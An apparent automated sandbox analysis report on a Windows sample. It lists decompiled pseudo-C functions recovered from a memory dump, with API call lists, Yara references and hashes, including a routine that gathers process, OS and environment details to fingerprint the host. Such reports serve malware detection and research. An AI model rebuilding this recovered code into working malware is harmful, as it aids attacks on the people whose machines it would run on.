                                                                                                                                                                                                0x00afe3ef
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe3f4
                                                                                                                                                                                                0x00afe355
                                                                                                                                                                                                0x00afe358
                                                                                                                                                                                                0x00afe35f
                                                                                                                                                                                                0x00afe36f
                                                                                                                                                                                                0x00afe375
                                                                                                                                                                                                0x00afe385
                                                                                                                                                                                                0x00afe38a
                                                                                                                                                                                                0x00afe38f
                                                                                                                                                                                                0x00afe396
                                                                                                                                                                                                0x00afe39a
                                                                                                                                                                                                0x00afe3a1
                                                                                                                                                                                                0x00afe3a5
                                                                                                                                                                                                0x00afe3a9
                                                                                                                                                                                                0x00afe3aa
                                                                                                                                                                                                0x00afe3ad
                                                                                                                                                                                                0x00afe3b2
                                                                                                                                                                                                0x00afe3bb
                                                                                                                                                                                                0x00afe3c7
                                                                                                                                                                                                0x00afe3d1
                                                                                                                                                                                                0x00afe3d6
                                                                                                                                                                                                0x00afe3d6
                                                                                                                                                                                                0x00afe3bb
                                                                                                                                                                                                0x00afe3dc
                                                                                                                                                                                                0x00afe3dd
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe3e6
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(0000000A), ref: 00AFE3D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                • Opcode ID: cdf2f33adf88ec46a76529389069fc604af83949685b253bf73a849484e11a84
                                                                                                                                                                                                • Instruction ID: bc21ad1ceca979c880f52c8c53660f7bf371931be5801b1d39fc9bae5ef763af
                                                                                                                                                                                                • Opcode Fuzzy Hash: cdf2f33adf88ec46a76529389069fc604af83949685b253bf73a849484e11a84
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8531E7B590020DAFDB11DFD4DD88DEEBBBCEB18350F1146A6B621E7251DB30DA058B61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA3D8, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA3D8(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00AF9E9B(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00AF972A( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E00AFA076(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00AF9F13( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}













                                                                                                                                                                                                0x00afa3d8
                                                                                                                                                                                                0x00afa3e1
                                                                                                                                                                                                0x00afa3e3
                                                                                                                                                                                                0x00afa3e5
                                                                                                                                                                                                0x00afa3e9
                                                                                                                                                                                                0x00afa3eb
                                                                                                                                                                                                0x00afa3f3
                                                                                                                                                                                                0x00afa3fa
                                                                                                                                                                                                0x00afa403
                                                                                                                                                                                                0x00afa408
                                                                                                                                                                                                0x00afa40d
                                                                                                                                                                                                0x00afa431
                                                                                                                                                                                                0x00afa436
                                                                                                                                                                                                0x00afa43c
                                                                                                                                                                                                0x00afa448
                                                                                                                                                                                                0x00afa44d
                                                                                                                                                                                                0x00afa40f
                                                                                                                                                                                                0x00afa418
                                                                                                                                                                                                0x00afa42e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa41a
                                                                                                                                                                                                0x00afa426
                                                                                                                                                                                                0x00afa42b
                                                                                                                                                                                                0x00afa418
                                                                                                                                                                                                0x00afa40d
                                                                                                                                                                                                0x00afa450
                                                                                                                                                                                                0x00afa451
                                                                                                                                                                                                0x00afa3eb
                                                                                                                                                                                                0x00afa45b

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF972A: SetLastError.KERNEL32(0000000D,00000000,00000000,00AFA32C,00000000,00000000,?,?,?,00AF5AD4), ref: 00AF9763
                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00AF4C53,?,?,00000000), ref: 00AFA40F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                • Opcode ID: c9434b93cafd57101f59311598eb3a1a6d4ccf75b317b5b67afcb55ca859e1a0
                                                                                                                                                                                                • Instruction ID: 1c9d289fbf98ac98fad55a837ee6dc9e75c6a2e89c2bf945830e9be173d8ea1a
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9434b93cafd57101f59311598eb3a1a6d4ccf75b317b5b67afcb55ca859e1a0
                                                                                                                                                                                                • Instruction Fuzzy Hash: A911A5B9600109AFCB10DF98C5856BEF3A5BB94305F208128E51A97241DB70ED058BD1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF5D5E, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                			E00AF5D5E(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0xb0e688; // 0xb20000
				E00AFA8AF( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0xb0e684; // 0x4d3f6c8
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0xb0e688; // 0xb20000
					_t12 = E00AF5967( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0xb0e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00AF9E86();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0xb0e688; // 0xb20000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















                                                                                                                                                                                                0x00af5d61
                                                                                                                                                                                                0x00af5d76
                                                                                                                                                                                                0x00af5d7f
                                                                                                                                                                                                0x00af5d88
                                                                                                                                                                                                0x00af5d8a
                                                                                                                                                                                                0x00af5d92
                                                                                                                                                                                                0x00af5da2
                                                                                                                                                                                                0x00af5db0
                                                                                                                                                                                                0x00af5db5
                                                                                                                                                                                                0x00af5dba
                                                                                                                                                                                                0x00af5dbc
                                                                                                                                                                                                0x00af5dbe
                                                                                                                                                                                                0x00af5dc3
                                                                                                                                                                                                0x00af5dc5
                                                                                                                                                                                                0x00af5de0
                                                                                                                                                                                                0x00af5de0
                                                                                                                                                                                                0x00af5dc7
                                                                                                                                                                                                0x00af5dc8
                                                                                                                                                                                                0x00af5dd3
                                                                                                                                                                                                0x00af5ddb
                                                                                                                                                                                                0x00af5ddd
                                                                                                                                                                                                0x00af5ddd
                                                                                                                                                                                                0x00af5dc5
                                                                                                                                                                                                0x00af5de2
                                                                                                                                                                                                0x00af5d94
                                                                                                                                                                                                0x00af5d95
                                                                                                                                                                                                0x00af5d9a
                                                                                                                                                                                                0x00af5d9f
                                                                                                                                                                                                0x00af5d9f
                                                                                                                                                                                                0x00af5de6

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00B1FDD8,00000000), ref: 00AF5DD3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcmpi
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1586166983-0
                                                                                                                                                                                                • Opcode ID: 0f461fb5be3f5d5b2be5733335955026b22da5fddca83e634f2b0b3be89b11b8
                                                                                                                                                                                                • Instruction ID: d0ad9d850637f07077ba7c77fb924c11467b357392bb6f02fa08b8eaec6d411b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f461fb5be3f5d5b2be5733335955026b22da5fddca83e634f2b0b3be89b11b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: D401F771B011159FE700E7FAED49FA677ACAF28740F454520F301D7191DE20D800CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF5CCD, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF5CCD(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0xb0e688; // 0xb20000
				E00B024D3(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E00AF85D0();
				E00AF8F59();
				 *0xb0e780 = 0;
				 *0xb0e784 = 0;
				 *0xb0e77c = 0;
				E00AF5E97(); // executed
				E00AFCFC6(_t24);
				_t14 =  *0xb0e688; // 0xb20000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xb0e688; // 0xb20000
				E00AFA8AF( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E00AFB379( &_v44);
				memset( &_v44, 0, 0x27);
				E00AF5C07( &_v44, __fp0);
				_t21 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}











                                                                                                                                                                                                0x00af5ccd
                                                                                                                                                                                                0x00af5ccd
                                                                                                                                                                                                0x00af5cd0
                                                                                                                                                                                                0x00af5cdf
                                                                                                                                                                                                0x00af5ce4
                                                                                                                                                                                                0x00af5ce9
                                                                                                                                                                                                0x00af5cf0
                                                                                                                                                                                                0x00af5cf6
                                                                                                                                                                                                0x00af5cfc
                                                                                                                                                                                                0x00af5d02
                                                                                                                                                                                                0x00af5d07
                                                                                                                                                                                                0x00af5d0c
                                                                                                                                                                                                0x00af5d14
                                                                                                                                                                                                0x00af5d1e
                                                                                                                                                                                                0x00af5d2c
                                                                                                                                                                                                0x00af5d34
                                                                                                                                                                                                0x00af5d40
                                                                                                                                                                                                0x00af5d48
                                                                                                                                                                                                0x00af5d4d
                                                                                                                                                                                                0x00af5d53
                                                                                                                                                                                                0x00af5d5d

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00AF5F88), ref: 00AF85D9
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetCurrentProcess.KERNEL32(?,?,00B20000,?,00AF3538), ref: 00AFCFD2
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetModuleFileNameW.KERNEL32(00000000,00B21644,00000105,?,?,00B20000,?,00AF3538), ref: 00AFCFF3
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: memset.MSVCRT ref: 00AFD024
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetVersionExA.KERNEL32(00B20000,00B20000,?,00AF3538), ref: 00AFD02F
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetCurrentProcessId.KERNEL32(?,00AF3538), ref: 00AFD035
                                                                                                                                                                                                  • Part of subcall function 00AFB379: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00AF3C7D,?,?,?,?,?,?,?,?,00AF3D62,00000000), ref: 00AFB3AC
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF5D40
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcessmemset$ChangeCloseCreateFileFindHeapModuleNameNotificationVersion
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2687588655-0
                                                                                                                                                                                                • Opcode ID: 85f859c67f83ddfc3b6d1d012678fc1ecf01358ff3483f9a35f88ec663e63fd6
                                                                                                                                                                                                • Instruction ID: 01be288bc0ba095e0b09faaf9598859817a8a6cabd5d8acb6e246408fcb3bfc0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 85f859c67f83ddfc3b6d1d012678fc1ecf01358ff3483f9a35f88ec663e63fd6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D016D715012199FE604FBE8EE4AEA93BE4EF28310F450561F614A7222EF709945CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00AFD061, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E00AFD061(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xb0e69c; // 0x10000000
				_t81 = E00AF85E5(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xb0e684; // 0x4d3f6c8
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00B02339( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00AF8F9F(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E00AFBA47();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E00AFBBCF( *_t88) == 0) {
					_t90 = E00AFBAA4(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E00AFE433(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E00AFE3F8(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xb0e68c; // 0x4d3f890
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xb0e694; // 0x4d3f820
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00AF8F9F(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E00AFB7EA(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E00AFB6BF(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00AF8FB9(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E00AFD442(_t43, E00AFC3BB(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E00AFB8CC(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E00AFBC21(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xb0e684; // 0x4d3f6c8
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E00AF95C2(_t199, 0x10c);
				_t200 =  *0xb0e684; // 0x4d3f6c8
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E00AF85B6( &_v8);
				_t124 =  *0xb0e684; // 0x4d3f6c8
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00AF9621(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0xb0e684; // 0x4d3f6c8
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0xb0e684; // 0x4d3f6c8
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0xb0e684; // 0x4d3f6c8
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00B02339(E00AFD442(_t75, E00AFC3BB(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E00B0230B( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E00AF900E(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E00AFCD75(_t79);
				return _t222;
			}



















































                                                                                                                                                                                                0x00afd061
                                                                                                                                                                                                0x00afd06b
                                                                                                                                                                                                0x00afd077
                                                                                                                                                                                                0x00afd07c
                                                                                                                                                                                                0x00afd081
                                                                                                                                                                                                0x00afd441
                                                                                                                                                                                                0x00afd441
                                                                                                                                                                                                0x00afd08e
                                                                                                                                                                                                0x00afd094
                                                                                                                                                                                                0x00afd099
                                                                                                                                                                                                0x00afd09f
                                                                                                                                                                                                0x00afd0af
                                                                                                                                                                                                0x00afd0bb
                                                                                                                                                                                                0x00afd0bb
                                                                                                                                                                                                0x00afd0c4
                                                                                                                                                                                                0x00afd0ca
                                                                                                                                                                                                0x00afd0cc
                                                                                                                                                                                                0x00afd0d5
                                                                                                                                                                                                0x00afd0d5
                                                                                                                                                                                                0x00afd0e1
                                                                                                                                                                                                0x00afd0e5
                                                                                                                                                                                                0x00afd0ea
                                                                                                                                                                                                0x00afd0f0
                                                                                                                                                                                                0x00afd0f9
                                                                                                                                                                                                0x00afd107
                                                                                                                                                                                                0x00afd10e
                                                                                                                                                                                                0x00afd113
                                                                                                                                                                                                0x00afd113
                                                                                                                                                                                                0x00afd114
                                                                                                                                                                                                0x00afd0fb
                                                                                                                                                                                                0x00afd0fb
                                                                                                                                                                                                0x00afd0fb
                                                                                                                                                                                                0x00afd11a
                                                                                                                                                                                                0x00afd125
                                                                                                                                                                                                0x00afd133
                                                                                                                                                                                                0x00afd139
                                                                                                                                                                                                0x00afd13d
                                                                                                                                                                                                0x00afd143
                                                                                                                                                                                                0x00afd14a
                                                                                                                                                                                                0x00afd151
                                                                                                                                                                                                0x00afd155
                                                                                                                                                                                                0x00afd15c
                                                                                                                                                                                                0x00afd15d
                                                                                                                                                                                                0x00afd16a
                                                                                                                                                                                                0x00afd16c
                                                                                                                                                                                                0x00afd171
                                                                                                                                                                                                0x00afd17e
                                                                                                                                                                                                0x00afd180
                                                                                                                                                                                                0x00afd180
                                                                                                                                                                                                0x00afd182
                                                                                                                                                                                                0x00afd18c
                                                                                                                                                                                                0x00afd198
                                                                                                                                                                                                0x00afd1a8
                                                                                                                                                                                                0x00afd1ae
                                                                                                                                                                                                0x00afd1b4
                                                                                                                                                                                                0x00afd1b6
                                                                                                                                                                                                0x00afd1c7
                                                                                                                                                                                                0x00afd1cd
                                                                                                                                                                                                0x00afd1d3
                                                                                                                                                                                                0x00afd1d8
                                                                                                                                                                                                0x00afd1de
                                                                                                                                                                                                0x00afd1e4
                                                                                                                                                                                                0x00afd1e9
                                                                                                                                                                                                0x00afd1ee
                                                                                                                                                                                                0x00afd1ee
                                                                                                                                                                                                0x00afd1f4
                                                                                                                                                                                                0x00afd1f4
                                                                                                                                                                                                0x00afd1fd
                                                                                                                                                                                                0x00afd209
                                                                                                                                                                                                0x00afd211
                                                                                                                                                                                                0x00afd215
                                                                                                                                                                                                0x00afd215
                                                                                                                                                                                                0x00afd211
                                                                                                                                                                                                0x00afd219
                                                                                                                                                                                                0x00afd21f
                                                                                                                                                                                                0x00afd225
                                                                                                                                                                                                0x00afd22c
                                                                                                                                                                                                0x00afd23d
                                                                                                                                                                                                0x00afd243
                                                                                                                                                                                                0x00afd24b
                                                                                                                                                                                                0x00afd252
                                                                                                                                                                                                0x00afd265
                                                                                                                                                                                                0x00afd26b
                                                                                                                                                                                                0x00afd270
                                                                                                                                                                                                0x00afd273
                                                                                                                                                                                                0x00afd276
                                                                                                                                                                                                0x00afd27c
                                                                                                                                                                                                0x00afd282
                                                                                                                                                                                                0x00afd284
                                                                                                                                                                                                0x00afd28a
                                                                                                                                                                                                0x00afd293
                                                                                                                                                                                                0x00afd296
                                                                                                                                                                                                0x00afd296
                                                                                                                                                                                                0x00afd299
                                                                                                                                                                                                0x00afd2a1
                                                                                                                                                                                                0x00afd2ac
                                                                                                                                                                                                0x00afd2b2
                                                                                                                                                                                                0x00afd2a3
                                                                                                                                                                                                0x00afd2a5
                                                                                                                                                                                                0x00afd2a5
                                                                                                                                                                                                0x00afd2bb
                                                                                                                                                                                                0x00afd2bb
                                                                                                                                                                                                0x00afd2c1
                                                                                                                                                                                                0x00afd2c9
                                                                                                                                                                                                0x00afd2d4
                                                                                                                                                                                                0x00afd2d9
                                                                                                                                                                                                0x00afd2df
                                                                                                                                                                                                0x00afd2e1
                                                                                                                                                                                                0x00afd2ee
                                                                                                                                                                                                0x00afd2ef
                                                                                                                                                                                                0x00afd2f0
                                                                                                                                                                                                0x00afd2fb
                                                                                                                                                                                                0x00afd2fd
                                                                                                                                                                                                0x00afd304
                                                                                                                                                                                                0x00afd304
                                                                                                                                                                                                0x00afd30e
                                                                                                                                                                                                0x00afd313
                                                                                                                                                                                                0x00afd318
                                                                                                                                                                                                0x00afd318
                                                                                                                                                                                                0x00afd31e
                                                                                                                                                                                                0x00afd325
                                                                                                                                                                                                0x00afd326
                                                                                                                                                                                                0x00afd333
                                                                                                                                                                                                0x00afd346
                                                                                                                                                                                                0x00afd34b
                                                                                                                                                                                                0x00afd350
                                                                                                                                                                                                0x00afd359
                                                                                                                                                                                                0x00afd359
                                                                                                                                                                                                0x00afd35f
                                                                                                                                                                                                0x00afd364
                                                                                                                                                                                                0x00afd36a
                                                                                                                                                                                                0x00afd370
                                                                                                                                                                                                0x00afd375
                                                                                                                                                                                                0x00afd37e
                                                                                                                                                                                                0x00afd380
                                                                                                                                                                                                0x00afd387
                                                                                                                                                                                                0x00afd387
                                                                                                                                                                                                0x00afd38d
                                                                                                                                                                                                0x00afd395
                                                                                                                                                                                                0x00afd39a
                                                                                                                                                                                                0x00afd39b
                                                                                                                                                                                                0x00afd3a0
                                                                                                                                                                                                0x00afd3a9
                                                                                                                                                                                                0x00afd3ab
                                                                                                                                                                                                0x00afd3b6
                                                                                                                                                                                                0x00afd3b6
                                                                                                                                                                                                0x00afd3bf
                                                                                                                                                                                                0x00afd3c7
                                                                                                                                                                                                0x00afd3ce
                                                                                                                                                                                                0x00afd3d3
                                                                                                                                                                                                0x00afd3e2
                                                                                                                                                                                                0x00afd3fa
                                                                                                                                                                                                0x00afd401
                                                                                                                                                                                                0x00afd40f
                                                                                                                                                                                                0x00afd421
                                                                                                                                                                                                0x00afd428
                                                                                                                                                                                                0x00afd435
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00AFD088
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 00AFD0C4
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD0E1
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFD180
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 00AFD1AE
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFD1B4
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 00AFD209
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD250
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFD26B
                                                                                                                                                                                                • GetVersionExA.KERNEL32(00000000), ref: 00AFD276
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000100), ref: 00AFD290
